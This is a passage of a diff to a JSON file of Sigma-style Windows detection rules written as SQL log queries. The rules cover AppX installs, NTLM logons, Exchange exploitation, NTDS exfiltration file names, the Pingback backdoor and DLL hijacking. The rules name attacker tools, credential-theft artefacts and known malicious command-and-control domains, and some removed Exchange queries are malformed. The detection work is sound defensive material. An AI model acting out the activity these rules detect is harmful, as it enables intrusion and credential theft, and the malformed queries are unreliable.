"win_appxdeployment_server_susp_appx_package_installation.yml" + "filename": "file_event_win_office_publisher_files_in_susp_locations.yml" }, { - "title": "Deployment AppX Package Was Blocked By AppLocker", - "id": "6ae53108-c3a0-4bee-8f45-c7591a2c337f", + "title": "Suspicious Screensaver Binary File Creation", + "id": 
"97aa2e88-555c-450d-85a6-229bcd87efb8", "status": "experimental", - "description": "Detects an appx package deployment that was blocked by AppLocker policy", + "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\n", "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.persistence", + "attack.t1546.002" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '412')" - ], - "filename": "win_appxdeployment_server_applocker_block.yml" - }, - { - "title": "Potential Malicious AppX Package Installation Attempts", - "id": "09d3b48b-be17-47f5-bf4e-94e7e75d09ce", - "status": "experimental", - "description": "Detects potential installation or installation attempts of known malicious appx packages", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion" - ], - "falsepositives": [ - "Rare occasions where a malicious package uses the exact same name and version as a legtimate application" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID IN ('400', '401') AND PackageFullName LIKE '%3669e262-ec02-4e9d-bcb4-3d008b4afac9%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%.scr' ESCAPE '\\' AND NOT (((Image LIKE '%\\\\Kindle.exe' ESCAPE '\\' OR Image LIKE '%\\\\Bin\\\\ccSvcHst.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\uwfservicingscr.scr' ESCAPE '\\')))" ], - "filename": "win_appxdeployment_server_mal_appx_names.yml" + "filename": 
"file_event_win_creation_scr_binary_file.yml" }, { - "title": "Suspicious AppX Package Locations", - "id": "5cdeaf3d-1489-477c-95ab-c318559fc051", + "title": "Legitimate Application Dropped Archive", + "id": "654fcc6d-840d-4844-9b07-2c3300e54a26", "status": "experimental", - "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is located in suspicious locations", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects programs on a Windows system that should not write an archive to disk", + "author": "frack113, Florian Roth", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Path LIKE '%/users/public/%' ESCAPE '\\' OR Path LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR Path LIKE '%C:/perflogs/%' ESCAPE '\\' OR Path LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Path LIKE '%/desktop/%' ESCAPE '\\' OR Path LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Path LIKE '%/Downloads/%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%C:/Windows/Temp/%' ESCAPE '\\' OR Path LIKE '%\\\\AppdData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%/AppdData/Local/Temp/%' ESCAPE '\\'))" - ], - "filename": "win_appxdeployment_server_susp_package_locations.yml" - }, - { - "title": "Uncommon AppX Package Locations", - "id": "c977cb50-3dff-4a9f-b873-9290f56132f1", - "status": "experimental", - "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is located in uncommon locations", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion" - ], - "falsepositives": [ - "Unknown" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 
'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND NOT (((Path LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\SystemApps\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\PrintDialog\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\ImmersiveControlPanel\\\\%' ESCAPE '\\' OR Path LIKE '%x-windowsupdate://%' ESCAPE '\\' OR Path LIKE '%file:///C:/Program\\%20Files%' ESCAPE '\\')) OR ((Path LIKE '%https://statics.teams.cdn.office.net/%' ESCAPE '\\' OR Path LIKE '%microsoft.com%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordview.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Image LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR Image LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.7z' ESCAPE '\\' OR TargetFilename LIKE '%.diagcab' ESCAPE '\\' OR TargetFilename LIKE '%.appx' ESCAPE '\\'))" ], - "filename": "win_appxdeployment_server_uncommon_package_locations.yml" + "filename": "file_event_win_legitimate_app_dropping_archive.yml" }, 
{ - "title": "WMI Persistence", - "id": "0b7889b4-5577-4521-a60a-3376ee7f9f7b", + "title": "Pingback Backdoor File Indicators", + "id": "2bd63d53-84d4-4210-80ff-bf0658f1bf78", "status": "test", - "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", - "author": "Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community", + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "author": "Bhabesh Raj", "tags": [ "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.003" - ], - "falsepositives": [ - "Unknown (data set is too small; further testing needed)" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (((EventID = '5861' AND (logs MATCH ('\"ActiveScriptEventConsumer\" OR \"CommandLineEventConsumer\" OR \"CommandLineTemplate\"'))) OR EventID = '5859') AND NOT (Provider = 'SCM Event Provider' AND Query LIKE 'select % from MSFT\\_SCMEventLogEvent' ESCAPE '\\' AND User = 'S-1-5-32-544' AND PossibleCause = 'Permanent'))" - ], - "filename": "win_wmi_persistence.yml" - }, - { - "title": "Sysinternals Tools AppX Versions Execution", - "id": "d29a20b2-be4b-4827-81f2-3d8a59eab5fc", - "status": "experimental", - "description": "Detects execution of Sysinternals tools via an AppX package. 
Attackers could install the Sysinternals Suite to get access to tools such as psexec and procdump to avoid detection based on System paths", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.execution" - ], - "falsepositives": [ - "Legitimate usage of the applications from the Windows Store" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppModel-Runtime/Admin' AND EventID = '201' AND ImageName IN ('procdump.exe', 'psloglist.exe', 'psexec.exe', 'livekd.exe', 'ADExplorer.exe'))" - ], - "filename": "win_appmodel_runtime_sysinternals_tools_appx_execution.yml" - }, - { - "title": "CVE-2021-1675 Print Spooler Exploitation", - "id": "f34d942d-c8c4-4f1f-b196-22471aecf10a", - "status": "test", - "description": "Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.execution", - "attack.t1569", - "cve.2021.1675" - ], - "falsepositives": [ - "Unknown" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-PrintService/Operational' AND EventID = '316' AND (logs MATCH ('\"UNIDRV.DLL, kernelbase.dll, \" OR \" 123 \" OR \" 1234 \" OR \"mimispool\"')))" - ], - "filename": "win_exploit_cve_2021_1675_printspooler_operational.yml" - }, - { - "title": "Potential Active Directory Reconnaissance/Enumeration Via LDAP", - "id": "31d68132-4038-47c7-8f8e-635a39a7c174", - "status": "test", - "description": "Detects potential Active Directory enumeration via LDAP", - "author": "Adeem Mawani", - "tags": [ - "attack.discovery", - "attack.t1069.002", - "attack.t1087.002", - "attack.t1482" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (((EventID = '30' AND (SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483648)%' ESCAPE '\\' OR SearchFilter LIKE 
'%(groupType:1.2.840.113556.1.4.803:=2147483656)%' ESCAPE '\\' OR SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483652)%' ESCAPE '\\' OR SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483650)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=805306369)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=805306368)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=536870913)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=536870912)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=268435457)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=268435456)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=groupPolicyContainer)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=organizationalUnit)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=Computer)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=nTDSDSA)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=server)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=domain)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=person)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=group)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=user)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=trustedDomain)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=computer)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=server)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=group)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=user)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=521)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=516)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=515)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=512)%' ESCAPE '\\' OR SearchFilter LIKE '%Domain Admins%' ESCAPE '\\' OR SearchFilter LIKE '%objectGUID=\\*' ESCAPE '\\' OR SearchFilter LIKE '%(schemaIDGUID=\\*)%' ESCAPE '\\')) AND NOT (EventID = '30' AND (SearchFilter LIKE '%(domainSid=%)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectSid=%)%' 
ESCAPE '\\'))) OR (EventID = '30' AND (SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=4194304)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=2097152)%' ESCAPE '\\' OR SearchFilter LIKE '%!(userAccountControl:1.2.840.113556.1.4.803:=1048574)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=524288)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=65536)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=8192)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=544)%' ESCAPE '\\' OR SearchFilter LIKE '%!(UserAccountControl:1.2.840.113556.1.4.803:=2)%' ESCAPE '\\' OR SearchFilter LIKE '%msDS-AllowedToActOnBehalfOfOtherIdentity%' ESCAPE '\\' OR SearchFilter LIKE '%msDS-AllowedToDelegateTo%' ESCAPE '\\' OR SearchFilter LIKE '%msDS-GroupManagedServiceAccount%' ESCAPE '\\' OR SearchFilter LIKE '%(accountExpires=9223372036854775807)%' ESCAPE '\\' OR SearchFilter LIKE '%(accountExpires=0)%' ESCAPE '\\' OR SearchFilter LIKE '%(adminCount=1)%' ESCAPE '\\' OR SearchFilter LIKE '%ms-MCS-AdmPwd%' ESCAPE '\\')))" - ], - "filename": "win_ldap_recon.yml" - }, - { - "title": "Block Load Of Revoked Driver", - "id": "9b72b82d-f1c5-4632-b589-187159bc6ec1", - "description": "Detects blocked load attempts of revoked drivers", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "status": "experimental", - "tags": [ - "attack.privilege_escalation", - "attack.t1543" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3023')" - ], - "filename": "win_codeintegrity_revoked_driver.yml" - }, - { - "title": "Code Integrity Attempted DLL Load", - "id": "f8931561-97f5-4c46-907f-0a4a592e47a7", - "description": "Detects attempted DLL load events that didn't meet anti-malware or Windows signing level 
requirements. It often means the file's signature is revoked or expired", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", - "status": "experimental", - "tags": [ - "attack.execution" + "attack.t1574.001" ], "falsepositives": [ - "Antivirus products" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3033' AND NOT ((FileNameBuffer LIKE '%\\\\Program Files\\\\DTrace\\\\dtrace.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND RequestedPolicy = '12' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\Gui\\\\Keybase.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\') AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\SIHClient.exe' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Microsoft Office\\\\root\\\\vfs\\\\ProgramFilesCommonX64\\\\Microsoft Shared\\\\OFFICE%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\MSOXMLMF.DLL' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\slack\\\\app-%' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\slack.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR 
((FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavcodec.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavutil.dll' ESCAPE '\\') AND ProcessNameBuffer LIKE '%\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND RequestedPolicy = '8') OR ((FileNameBuffer LIKE '%\\\\Program Files\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR ((FileNameBuffer LIKE '%\\\\stdole.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\msdatasrc.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\adodb.dll' ESCAPE '\\') AND ProcessNameBuffer LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\Microsoft.NET\\\\%' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '2') OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Google\\\\Drive File Stream\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\crashpad\\_handler.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%updata.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" ], - "filename": "win_codeintegrity_attempted_dll_load.yml" + "filename": "file_event_win_malware_pingback_backdoor.yml" }, { - "title": "Code Integrity Blocked Driver Load", - "id": "e4be5675-4a53-426a-8c81-a8bb2387e947", - "description": "Detects blocked load events that did not meet the authenticode signing level requirements or violated code integrity policy", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Windows Shell/Scripting Application File Write to Suspicious Folder", + "id": "1277f594-a7d1-4f28-a2d3-73af5cbeab43", "status": "experimental", - "tags": [ - 
"attack.privilege_escalation", - "attack.t1543" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3077')" - ], - "filename": "win_codeintegrity_blocked_driver_load.yml" - }, - { - "title": "GALLIUM Artefacts - Builtin", - "id": "3db10f25-2527-4b79-8d4b-471eb900ee29", - "status": "test", - "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", - "author": "Tim Burrell", - "tags": [ - "attack.credential_access", - "attack.command_and_control", - "attack.t1071" - ], + "description": "Detects Windows shells and scripting applications that write files to suspicious folders", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '257' AND QNAME IN ('asyspy256.ddns.net', 'hotkillmail9sddcc.ddns.net', 'rosaf112.ddns.net', 'cvdfhjh1231.myftp.biz', 'sz2016rose.ddns.net', 'dffwescwer4325.myftp.biz', 'cvdfhjh1231.ddns.net'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\')) OR ((Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\') AND 
(TargetFilename LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))))" ], - "filename": "win_dns_analytic_apt_gallium.yml" + "filename": "file_event_win_shell_write_susp_directory.yml" }, { - "title": "Potential Remote Desktop Connection to Non-Domain Host", - "id": "ce5678bb-b9aa-4fb5-be4b-e57f686256ad", + "title": "Suspicious NTDS Exfil Filename Patterns", + "id": "3a8da4e0-36c1-40d2-8b29-b3e890d5172a", "status": "test", - "description": "Detects logons using NTLM to hosts that are potentially not part of the domain.", - "author": "James Pemberton", - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], - "falsepositives": [ - "Host connections to valid domains, exclude these.", - "Host connections not using host FQDN.", - "Host connections to external legitimate domains." - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Provider_Name = 'Microsoft-Windows-NTLM/Operational' AND EventID = '8001' AND TargetName LIKE 'TERMSRV%' ESCAPE '\\')" - ], - "filename": "win_susp_ntlm_rdp.yml" - }, - { - "title": "NTLM Logon", - "id": "98c3bcf1-56f2-49dc-9d8d-c66cf190238b", - "status": "experimental", - "description": "Detects logons using NTLM, which could be caused by a legacy source or attackers", + "description": "Detects suspicious creations of files with names used in various tools that export the NTDS.DIT for exfiltration", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.lateral_movement", - "attack.t1550.002" - ], - "falsepositives": [ - "Legacy hosts" - ], - "level": "low", - "rule": [ - "SELECT * FROM logs WHERE (Provider_Name = 'Microsoft-Windows-NTLM/Operational' AND EventID = '8002' AND ProcessName LIKE '%' ESCAPE '\\')" - ], - "filename": "win_susp_ntlm_auth.yml" - }, - { - "title": "NTLM Brute Force", - "id": "9c8acf1a-cbf9-4db6-b63c-74baabe03e59", - "status": "test", - "description": "Detects 
common NTLM brute force device names", - "author": "Jerry Shockley '@jsh0x'", "tags": [ "attack.credential_access", - "attack.t1110" - ], - "falsepositives": [ - "Systems with names equal to the spoofed ones used by the brute force tools" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Provider_Name = 'Microsoft-Windows-NTLM/Operational' AND EventID = '8004' AND WorkstationName IN ('Rdesktop', 'Remmina', 'Freerdp', 'Windows7', 'Windows8', 'Windows2012', 'Windows2016', 'Windows2019'))" - ], - "filename": "win_susp_ntlm_brute_force.yml" - }, - { - "title": "Remove Exported Mailbox from Exchange Webserver", - "id": "09570ae5-889e-43ea-aac0-0e1221fb3d95", - "status": "test", - "description": "Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit", - "author": "Christian Burkard (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1070" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Remove-MailboxExportRequest' AND = ' -Identity ' AND = ' -Confirm \"False\"')" - ], - "filename": "win_exchange_proxyshell_remove_mailbox_export.yml" - }, - { - "title": "Possible Exploitation of Exchange RCE CVE-2021-42321", - "id": "c92f1896-d1d2-43c3-92d5-7a5b35c217bb", - "status": "experimental", - "description": "Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321", - "author": "Florian Roth (Nextron Systems), @testanull", - "tags": [ - "attack.lateral_movement", - "attack.t1210" - ], - "falsepositives": [ - "Unknown, please report false positives via https://github.com/SigmaHQ/sigma/issues" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID IN ('6', '8') AND (Data LIKE '%Cmdlet failed. 
Cmdlet Get-App, %' ESCAPE '\\' OR Data LIKE '%Task Get-App throwing unhandled exception: System.InvalidCastException:%' ESCAPE '\\'))" - ], - "filename": "win_exchange_cve_2021_42321.yml" - }, - { - "title": "Exchange Set OabVirtualDirectory ExternalUrl Property", - "id": "9db37458-4df2-46a5-95ab-307e7f29e675", - "status": "test", - "description": "Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log", - "author": "Jose Rodriguez @Cyb3rPandaH", - "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Set-OabVirtualDirectory' AND = 'ExternalUrl' AND LIKE 'Page\\_Load' ESCAPE '\\' AND = 'script')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\All.cab' ESCAPE '\\' OR TargetFilename LIKE '%.ntds.cleartext' ESCAPE '\\'))" ], - "filename": "win_exchange_set_oabvirtualdirectory_externalurl.yml" + "filename": "file_event_win_ntds_exfil_tools.yml" }, { - "title": "Failed MSExchange Transport Agent Installation", - "id": "c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa", - "status": "experimental", - "description": "Detects a failed installation of a Exchange Transport Agent", - "author": "Tobias Michalski (Nextron Systems)", + "title": "New Outlook Macro Created", + "id": "8c31f563-f9a7-450c-bfa8-35f8f32f1f61", + "status": "test", + "description": "Detects the creation of a macro file for Outlook.", + "author": "@ScoubiMtl", "tags": [ "attack.persistence", - "attack.t1505.002" + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" ], "falsepositives": [ - "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." 
+ "User genuinely creates a VB Macro for their email" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID = '6' AND Data LIKE '%Install-TransportAgent%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\outlook.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\Outlook\\\\VbaProject.OTM' ESCAPE '\\')" ], - "filename": "win_exchange_transportagent_failed.yml" + "filename": "file_event_win_office_outlook_macro_creation.yml" }, { - "title": "MSExchange Transport Agent Installation - Builtin", - "id": "4fe151c2-ecf9-4fae-95ae-b88ec9c2fca6", - "status": "test", - "description": "Detects the Installation of a Exchange Transport Agent", - "author": "Tobias Michalski (Nextron Systems)", + "title": "Suspicious Files in Default GPO Folder", + "id": "5f87308a-0a5b-4623-ae15-d8fa1809bc60", + "status": "experimental", + "description": "Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder", + "author": "elhoim", "tags": [ - "attack.persistence", - "attack.t1505.002" + "attack.t1036.005", + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." 
+ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND logs MATCH ('\"Install-TransportAgent\"'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Policies\\\\{31B2F340-016D-11D2-945F-00C04FB984F9}\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\'))" ], - "filename": "win_exchange_transportagent.yml" + "filename": "file_event_win_susp_default_gpo_dir_write.yml" }, { - "title": "File Was Not Allowed To Run", - "id": "401e5d00-b944-11ea-8f9a-00163ecd60ae", + "title": "Powerup Write Hijack DLL", + "id": "602a1f13-c640-4d73-b053-be9a2fa58b96", "status": "test", - "description": "Detect run not allowed files. Applocker is a very useful tool, especially on servers where unprivileged users have access. For example terminal servers. You need configure applocker and log collect to receive these events.", - "author": "Pushkarev Dmitry", + "description": "Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.\nIn it's default mode, it builds a self deleting .bat file which executes malicious command.\nThe detection rule relies on creation of the malicious bat file (debug.bat by default).\n", + "author": "Subhash Popuri (@pbssubhash)", "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.t1059.001", - "attack.t1059.003", - "attack.t1059.005", - "attack.t1059.006", - "attack.t1059.007" + "attack.persistence", + "attack.privilege_escalation", + 